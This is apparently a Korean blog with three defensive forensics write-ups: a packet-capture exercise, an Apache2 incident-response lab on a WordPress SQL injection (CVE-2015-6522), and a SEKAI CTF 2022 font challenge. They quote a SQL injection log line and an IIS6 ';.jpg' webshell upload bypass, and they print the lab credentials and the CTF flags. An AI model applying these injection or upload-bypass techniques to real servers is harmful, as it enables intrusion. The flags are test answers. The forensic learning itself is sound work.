몇일 전, 아는 지인분에게 패킷 공부를 좀 하고싶다. 파일을 좀 달라해서 얻은 패킷 파일인 HackThePacket입니다.

난이도는 막 그렇게 어렵지 않으며, 저처럼 처음 네트워크 패킷 포렌식을 공부하는 입장에서는 간단하게 풀 수 있는 문제입니다!

문제를 한번 보겠습니다.

Telnet의 패스워드를 찾으시오.

80번 포트로 업로드 된 파일명을 찾으시오.

네이버에서 검색한 검색어를 찾으시오.(한글)

인터넷 쇼핑 중 실행된 웹쉘을 찾으시오?

찾아야 하는 문제는 총 4개로 바로 풀이를 해보도록 하겠다.

Telnet의 패스워드를 찾는 문제이다.

텔넷은 인터넷이나 로컬 영역 네트워크 연결에 쓰이는 네트워크 프로토콜이다. 쉽게 말해서 네트워크 관리를 할 수 있는 프로토콜입니다.

텔넷은 패킷이 잡힐 때, Protocol이 와이어샤크에서 TELNET으로 잡히기 때문에 쉽게 찾을 수 있다.

위 사진에 나와있는 검색 필터링에 telnet이라고 검색하면 텔넷만 나오게끔 필터링이 된다.

telnet 패킷을 필터링 하였으면 우클릭하고 [Follow] - [TCP Stream]을 하게 되면 문제에서 원하는 패스워드를 찾을 수 있게된다.

이것으로 보아 텔넷은 패킷을 보낼 때, 평문으로 전송하는 것을 확인할 수 있었다.

그리고 텔넷에는 에코 현상이 발생하는데 login같이 lleeoo로 2번씩 입력되는 것을 볼 수 있다. 이건 텔넷에서 일어나는 현상이기 때문에 큰 이상은 없다.

다음은 80번 포트로 업로드 된 파일명을 찾는 문제이다.

networkminer 프로그램으로 해당 패킷을 던져보면 무수히 많은 file들을 확인할 수 있다.

네트워크 패킷안에 1353개의 파일이 존재하는데 도대체 80번 포트로 보낸 파일들이 뭘까..? 고민을 하다가 하나씩 찾는 노가다를 진행했다.

포트번호가 80번인 파일들이다.

이걸로 찾아보니 뭐가 정답인지도 모르겠고...눈도 아프고해서 와이어샤크로 분석을 진행하였다.

문제를 자세히 읽어보면 업로드 된 파일명이라고 하였다. 업로드면 HTTP 메소드를 찾아보면 되니까 구글에 검색을 진행했다.

HTTP 메소드에는 GET, POST, PUT, DELETE, HEAD, OPTIONS, TRACE 등등 존재하는데 각각의 설명은 다음과 같다.

GET : 주로 데이터를 읽거나 검색할 때 사용되는 메소드, 지정한 URL에 대한 정보를 요청

POST : 서버에 데이터 처리를 요구할 때 사용(서버의 특정 값이나 서버의 상태를 변경할 때 사용), 새로운 리소스를 생성할 때 사용

PUT : 리소스를 생성 / 업데이트하기 위해 서버로 데이터를 보내는 데 사용, 지정된 URL에 HTTP 파일을 저장

DELETE : 지정된 URL의 리소스를 삭제

PATCH : 리소스를 일부만 변경

HEAD : GET과 동일하지만 메시지 부분을 제외하고, 상태 줄과 헤더만 반환

OPTIONS : 대상 리소스에 대한 통신 가능 옵션을 설명

TRACE : 대상 리소스에 대한 경로를 따라 메시지 루프백 테스트를 수행

* 리소스(resource) : 리로스란, 자원이라 불리며 사용될 수 있는 어떤 항목을 의미한다.

문제로 돌아가보면 파일을 하나 업로드 했다는것은 리소스를 생성했다는 의미가 된다.그렇기 때문에 PUT 메소드를 사용 했을 가능성이 있어 필터링으로 PUT만 검색해보도록 하자

패킷이 하나 잡히는데, iuzzang.txt 파일을 업로드 한 것으로 보인다.

다음 문제는 네이버에서 검색(서치)한 검색어를 찾아야 한다.

[File] - [Export Object] - [HTTP]를 들어가시면 http를 필터링하고 오브젝트를 뽑아옵니다.

결국엔 패킷 중 프로토콜이 http로 된 패킷들을 다 필터링 하여 가져온다는 얘기입니다.

호스트 네임을 보게되면 접속한 URL들을 확인할 수 있다. 결국엔 naver에서 검색을 했다면 search.naver.com 이런 느낌이 hostname에 잡힌다.

왜냐면 직접 naver에서 검색을 해서 url을 확인했더니 search.naver.com으로 나왔기 때문이다.

그럼...동일한 쿼리로된 구문으로써 검색을 했을테니까 search.naver.com과 query=로 된 패킷을 찾으면 된다.

1534번 패킷과 30061패킷을 보면 네이버에서 검색을 한 기록들을 확인할 수 있고, query= 뒤에 나오는 인코딩 된 문자열은 URL 인코딩 문자이기 때문에 복호화를 시켜주면 알 수 있다.

1534번 패킷을 토대로 본 네이버 검색어는 에이치티피이다.

30061번 패킷을 토대로 본 네이버 검색어는 데일리시큐이다.

이렇게 네이버에서 검색한 검색어는 2개로 에이치티피, 데일리시큐가 된다.

마지막 문제는 인터넷 쇼핑 중 실행된 웹쉘을 찾는 문제인데 전 시간에 배운 apache2 에서도 쉘 권한을 취득하기 위해 php 파일로 접근한 것이 기억이난다. 그래서 php를 검색했으나 답은 나오지 않았다. 그래서 구글링을 했더니 웹 쉘 공격은 jsp 파일이나 asp 파일로도 남을 수 있다고 한다.

웹 쉘

웹 셸(web shell)은 업로드 취약점을 통하여 시스템에 명령을 내릴 수 있는 코드를 말한다. webshell은 간단한 서버 스크립트 jsp,php,asp 로 만드는 방법이 널리 사용되며 이 스크립트들은 웹서버의 취약점을 통해 업로드 된다. 웹셀 설치시 해커들은 보안 시스템을 피하여 별도의 인증없이 시스템에 쉽게 접속 가능하다. (웹이 서버에서 구동되고 있다 하여도 취약점이 존재하지 않으면, 수행되지 않으며 만약 업로드되었다 하더라도 실행 권한이 없으면, 실행이 되지 않는다. 하지만 취약점과 실행권한이 존재할 때는 서버 내부에 명령을 수행할 수 있으므로 침해 범위가 넓어 질 수 있다.)

사용자로부터 입력된 시스템 명령어를 셸에 전달하는 기능을 가지고 있다.

이렇게 asp를 검색하여 패킷을 찾아봤더니 누가봐도 웹쉘일 것 같은 패킷이 보였다.

POST 메소드를 통해서 O+ne~Line@w&eb!sh@ell.asp;.jpg 즉, 웹 쉘이다. 라고 적혀있네요 ㅎㅎ

그리고 ;이 들어가면 제대로 인식못해서 확장자 필터를 우회해 asp 가 업로드되는 공격을 IIS6 파싱 취약점 이용한 공격 이었네요.

지금까지 간단한 패킷 분석을 진행했는데, 사실 텔넷은 진짜 쉬웠고 2번째 문제인 포트번호 80번 문제 업로드 파일과 웹 쉘을 찾는것이 어렵지만 구글링을 통해서 잘 나와있어서 쉽게 해결 했던 문제였던 것 같다.

[침해 사고] 웹 서버(Apache2) 로그 분석

Ron Weasley — Wed, 12 Oct 2022 19:28:37 +0900

웹 서버 로그분석은 침해 사고에 있어 가장 빈번하게 일어난다. 그렇게 때문에 분석을 진행 해보았다.

웹 서버

웹 서버는 소프트웨어로 보면 웹 브라우저와 같은 클라이언트로부터 HTTP 요청을 받아 들이고, HTML 문서와 같은 웹 페이지를 반환하는 컴퓨터 프로그램이고, 하드웨어로 본다면 위에서 언급한 기능을 제공하는 컴퓨터 프로그램을 실행하는 컴퓨터이다.

웹 서버를 분석하는 이유

분석하는 이유는 다양하지만 웹 서비스를 운영하고 있는 서버 관리자라면 외부에서 어떤 요청이 들어오고 있는지, 그리고 어떤 사용자가 있는지에 대한 정보를 담고 있는 Access 로그에 관심을 가지는 것이 당연하다. 왜냐하면 사람도 마찬가지지만 본인의 물건에 누가 손을 대는 것 조차 싫어하시는 분들이 많은데 서버도 마찬가지이다. 외부에서 공격이 들어온다면 좀...기분이 좋지 않으니까 분석을 진행 하는것이다.

로그 분석에 있어 모든 내용을 적진 않겠지만, 실습 파일을 가지고 문제를 풀어가는 시나리오 형태로 공부를 해볼 예정이다.

주어진 압축 파일을 다운 받고 풀게되면 vmx의 가상 환경이랑 시나리오가 주어진다.

시나리오 : 해당 서버는 웹 서버로 사용되던 서버이다. 어느날부터인가 비정상 트래픽이 감지가 되었고, 서버 운영자의 얘기로는 바이러스에 감염되었거나 해커에게 공격 당한것 같다라고 한다. 해당 서버를 분석하여 이상 징후를 찾아 분석하여라.

(sudo 권한 가능)
계정 ID : tester
계정 PW : 1234

1. 공격자의 IP는 무엇인가?
2. 공격에 사용된 CVE 넘버는 무엇인가?
3. 공격에 취약한 파라미터(함수)는 무엇인가?
4. 해커가 침임 후 수정한 파일 목록은 무엇인가?
5. 서버에 설치된 악성코드의 이름은 무엇인가?
6. 악성코드가 하는 행위는 무엇인가?
7. 해커가 궁극적으로 웹 서버를 해킹한 목적은 무엇인가?

주어진 시나리오를 보면 위와 같이 적혀있다. 그렇기 때문에 하나씩 분석을 진행 하도록 하겠다.

WEB 폴더를 들어가게 되면 Usvr.vmx 파일이 존재하는데 더블 클릭하여 부팅을 시도한다.

부팅을 하게 되면 CLI 환경이 나올텐데, 나는 CLI 보다 GUI가 편한 관계로 GUI로 변환시켜서 재부팅해줬다.

GUI로 변환 방법
1) apt-get 도구 업데이트
$ sudo apt-get update

2) apt-get 도구 업그레이드
$ sudo apt-get upgrade

3) desktop 설치
$ sudo apt-get install ubuntu-desktop

* apt-get update를 하다가 이런 에러가 발생할 수 있다.
E: Could not get lock /var/lib/dpkg/lock-frontend - open (11: Resource temporarily unavailable)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), is another process using it?

이 경우 밑에 명령어를 입력하면 해결 된다.

$ sudo rm /var/lib/apt/lists/lock
$ sudo rm /var/cache/apt/archives/lock
$ sudo rm /var/lib/dpkg/lock*
$ sudo dpkg --configure -a

GUI가 설치 다 되었다면 다음과 같이 화면이 나올것이다.

분석을 진행하고 있는 우분투의 버전은 다음과 같다.

4.4.0-21-generic으로 보아 ubuntu16.04 버전임을 알 수 있다. 그리고 서버의 IP를 보도록 하겠다.

ipconfig 명령어를 사용하게 되면 address를 볼 수 있는데, URL을 입력을 해보면 사이트가 하나 나오게 된다.

여기까지 했으면 기본적으로 체크 해야 되는것은 끝났고...! 이제 문제를 풀어볼텐데, 1번을 보면 공격자의 IP를 찾아야한다.

웹 서버에서 공격자의 IP를 찾기 위해서는 웹 서버의 로그를 분석을 진행해야 하기 때문에 apache2 웹 서버가 로그를 남기는 경로인 /var/log/apache2/에 가서 Access.log를 vim으로 열어보겠다.

명령어는 다음과 같고 vim으로 열면 로그들을 볼 수 있다.

웹 로그들을 살펴보다보면 처음에는 분석하기 어려운 것들이 많지만 공격자의 IP가 담겨있는 로그를 하나 가져와서 하나씩 살펴보도록 하겠다.

① 192.168.127.131 - -
② [07/Jun/2016:04:54:37 + 9000]
③ "GET /wp/wp-content/plugins/wp-symposium-15.5.1/get_album_item.php?size=version() HTTP/1.1"
④ 200
⑤ 189
⑥ "-"
⑦ "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)

가져온 로그는 이제 150번째 줄에 나와있는 공격자가 시도한 SQL Injection 공격에 대한 로그이다.

1. 원격 호스트 IP 주소(요청자)

2. 요청 시간

3. "GET" 메서드를 사용하고 "/wp/wp-content/plugins/wp~~/get_album_item.php 파일에 "HTTP/1.1"의 프로토콜로 요청

4. HTTP 상태 코드 (200)

5. HTTP 헤더를 제외한 전송 바이트 수 (189)

6. 요청을 처리하는 데 걸린 시간(ms)

7. 리퍼러(referrer)

이 로그를 보면, 공격을 요청하는 IP 주소를 구할 수 있다.

답 : 192.168.127.131

다음 문제를 보도록 하겠다.

이번 문제는 공격에 시도된 CVE의 번호를 찾는 문제인데, 이 역시 로그를 살펴보면 알 수 있다. 웹 로그 3번의 GET 메서를 보게되면 wp-symposiup-15.5.1이라는 경로가 보인다. 무슨 경로인지 궁금해서 검색을 진행해보았다.

검색을 해보니 해당 사이트가 나오게 되었고, 타이틀을 보면 SQL Injection이라고 적혀있음을 확인할 수 있다.

조금 더 내려보면 CVE 번호가 나오는 것을 확인할 수 있었다.

답 : CVE-2015-6522

다음 문제는 공격에 취약한 파라미터(함수)를 찾는 문제인데, 밑에 ExploitDB를 클릭하면 Exploit 코드를 볼 수 있다.

코드를 읽어보면 get_album_item.php 파일의 파라미터인 size가 SQL Injection을 유발하는 함수가 된다.

답 : size

다음 문제는 해커가 침입을 한 후 수정한 파일 목록을 찾는 문제이다.

수정한 파일 목록이라면 해커가 공격을 시도한 후 변경된 파일들을 찾는 문제인 것으로 생각이 들었으므로 /var/log/apache2/ 경로에 error.log를 분석을 진행하였다. error.log는 웹 서버의 진단정보와 요청을 처리하는 도중 발생한 오류를 기록하는 파일로써 서버가 시작하거나 동작하는데 문제가 있다면 무엇이 잘못되었는지 저장되는 파일이다.

error 로그에 남은 정보들을 분석을 진행 결과,

42번째 로그부터 공격자 IP주소인 192.168.127.134로부터 접근이 있었고 에러가 발생한 것을 확인할 수 있었다.

에러가 끝난 시점은 약 40분 뒤인 5시 38분쯤 되보인다.

결국엔 이 시점에 일어난 일들 때문에 변경된 파일들을 찾아봐야 한다는 것이다.

특성 시점의 수정된 파일을 검색하기 위해서는 find -newer 옵션을 주고 사용하면 된다.

그 전에 A 시점부터 B 시점까지의 시간을 적어줘야 하기 때문에 다음과 같이 명령어를 입력하면 된다.

$ sudo touch -t 201606070454 start
$ sudo touch -t 201606070538 end

* -t 옵션은 시간을 옵션으로 주겠다는 의미입니다.

파일을 만들었으면 이 명령어를 실행합니다.
$ cd

밑에 명령어는 택일입니다.

$ sudo find / -newer /var/log/apache2/start -a ! -newer /var/log/apache2/end -print >> log.txt (전체 경로 기반)
$ sudo find /var/www/html/wp/ -newer /var/log/apache2/start -a ! -newer /var/log/apache2/end -print >> log.txt
(아파치가 정리 되는 경로에서만 출력)

$ cat log.txt

하나씩 보도록 하겠습니다.

start 파일과 end 파일이 생성된 것을 확인할 수 있습니다.

find 명령을 시도한 후 cat으로 출력을 한 결과입니다.

수정된 파일들이 출력이 됩니다.

다음 문제는 서버에 설치된 악성코드의 이름인데, 로그들을 살펴보면 wp-content.php와 연관되어 있음을 알 수 있다.

수정된 파일에서도 wp-content.php가 포함된다.

$ cd /var/www/html/wp/wp-content/
$ vim wp-content.php

위 명령어들을 입력하면 다음과 같은 vim창을 볼 수 있다.

ELF로 되어 있는 것으로 보아 리눅스 실행파일이네요...!

그렇기 때문에 악성코드의 이름은 wp-content.php입니다.

뭐...아까 처음에 봤던 size가 나와있는 get_album.php 코드도 한번 살펴보겠습니다.

경로 : cd /var/www/html/wp/wp-content/plugins/wp-symposium-15.5.1/

SQL Injection을 하는 코드가 나와있죠?? ㅋㅋㅋㅋㅋㅋㅋㅋ또 다른 파일인 index.php도 한번 볼까요?경로 : cd /var/www/html/wp

해당 파일은 뭐...exec로 wp-content.php를 실행하라!!! 라고 적혀있네요 ㅋㅋㅋㅋㅋ

악성코드가 하는 행위를 살펴보기 위해서 netstat를 사용하겠습니다.

만약에 악성코드가 동작을 하고 있다면, netstat에서 잡힐 것이기 때문에 백그라운드로 php 파일을 실행시키고 보겠습니다.

$ cd /var/www/html/wp/wp-content$ ./wp-content.php & (백그라운드로 실행)$ netstat -anp

SYN 패킷을 해당 IP로 보내고 있는것으로 보아 좀비PC로써 서버가 사용이 되고 있음을 알 수 있습니다.

마지막으로 이제 해커가 이 서버를 궁금적으로 해킹을 한 목적을 보면 권한 탈취, 악성코드 베포 목적, 좀비PC입니다.

이렇게 웹 서버 로그를 분석을 진행했는데...재미로 봐주셨으면 좋겠습니다!!

SEKAI CTF 2022 Write-up

Ron Weasley — Wed, 5 Oct 2022 20:27:34 +0900

이번에 롸업을 쓸 CTF는 SEKAI CTF 2022입니다.

[Broken Converter]

문제를 해석 하자면, 미쿠는 마침내 과제를 마쳤고 제출할 준비가 되었지만, 어떤 이유로 학교는 모든 과제를 .xps 파일로 제출하도록 요구한다. 미쿠는 온라인에서 변환기를 찾았고 변환된 파일을 제출에 사용했다. 파일이 처음에는 좋아 보였는데, 변환기에 뭔가 고장난 것 같아요. 무엇이 문제인지 그녀가 알아내는 것을 도와줄 수 있나요? 인데 결국은 xps 파일을 가지고 문제를 해결하라는 것이다.

xps 파일을 다운로드 받고 hxd로 열어보면 zip형식으로 되어 있는것을 확인할 수 있었다.

zip 형식으로 바꿔주면 파일들을 볼 수 있다.

파일들을 하나씩 다 보다보면 Resources 경로에 odttf 파일을 볼 수 있다.

odttf 파일이 뭔지 몰라서 구글에 검색을 해보니까 위키에서는 ODTTF 확장자를 가진 파일은 MS사의 XPS(XML Paper Specification) 및 Office Open XML 형식에 사용되는 포함된 글꼴 파일 형식이라고 적혀있다. 즉, 원본 문서에 사용된 글꼴을 기반으로 하는 난독화 된 하위 집합 글꼴을 나타내며, 글꼴 파일의 처음 32바이트는 GUID(글꼴 파일 이름)을 사용해서 XOR에 의해 난독화된다고 적혀있다.

복호화을 해주는 사이트를 찾다가 깃헙에서 odttf 파일을 ttf파일로 변환해주는 사이트를 발견하여 ttf 파일을 추출했다.

링크 : https://somanchiu.github.io/odttf2ttf/js/demo

복호화를 하면 ttf 파일이 추출되는데 실행을 시켜보면 깨진 글꼴들을 볼 수 있다.

깨진 ttf 파일을 복호화 시켜주는 사이트를 찾아서 넣어보니 플래그 값을 구할 수 있었다.

링크 : https://fontdrop.info/

FLAG : SEKAI{sCR4MBLeD_a5ci1-FONT+GlYPHZ,W3|!.d0n&}

[flag mono]

1번과 이어지는 문제이다.

해석을 해보면, 글꼴에는 다양한 스타일로 구성이 되어있다고 하는데...폰트를 열어보기 위해서 FontForge라는 프로그램을 사용하였다.

이 프로그램을 사용함에 있어 엄청 힘들었다. 왜냐면 영어도 안되고, 한글도 안되고 ㅋㅋㅋㅋ 글자가 많이 깨졌기 때문이다..

폰트를 열어서 [요소] - [폰트 정보] 를 들어가게 되면 Lookups를 클릭한 하면 폰트 스타일을 볼 수 있다.

지금은 한글이 깨져있지만, 우측에 메타데이터 편집을 누르게 되면 알아볼 수 있게 바뀐다.

이 점을 참고해서 보면, 스타일이 4개가 들어있음을 확인할 수 있었다.

결국은 이 4개의 폰트를 다 뜯어봐야 하는데, 진짜 한글이 깨지니까 찾아보기 너무 힘들었습니다.

이것을 열어보면, 다음과 같은 메타데이터가 나온다.

읽어보면, 뭔가 조회하라는 것인데...아까 처음에 봤던 사이트를 가보면, FontDrop이라는 사이트가 있다.

아까 파일을 던졌을 때, 사이트를 자세히 보면 기능들이 다양하게 있다.

그리고 딱 파일을 던졌을 때, You see하고 Q^<U가 보인다.

그리고 아까 FontForge에서 봤다시피 4개의 ss01, ss02, ss03, ss04가 있었다는 것을 확인할 수 있었다.

그래서 밑에 Glyphs , or, text 기능을 다 사용해본 결과 답을 얻을 수 있었다.

Type Yourself에 저 문자열을 넣고 ss01, ss02, ss03, ss04 다 열어보면 된다.

ss01만 열린것이 보이니까 다 하나씩 열어보면 충분히 답을 구할 수 있다.

FLAG : SEKAI{OpenTypeMagicGSUBIsTuringComplete}

진짜 태어나서 이런 포렌식은 처음 해봅니다..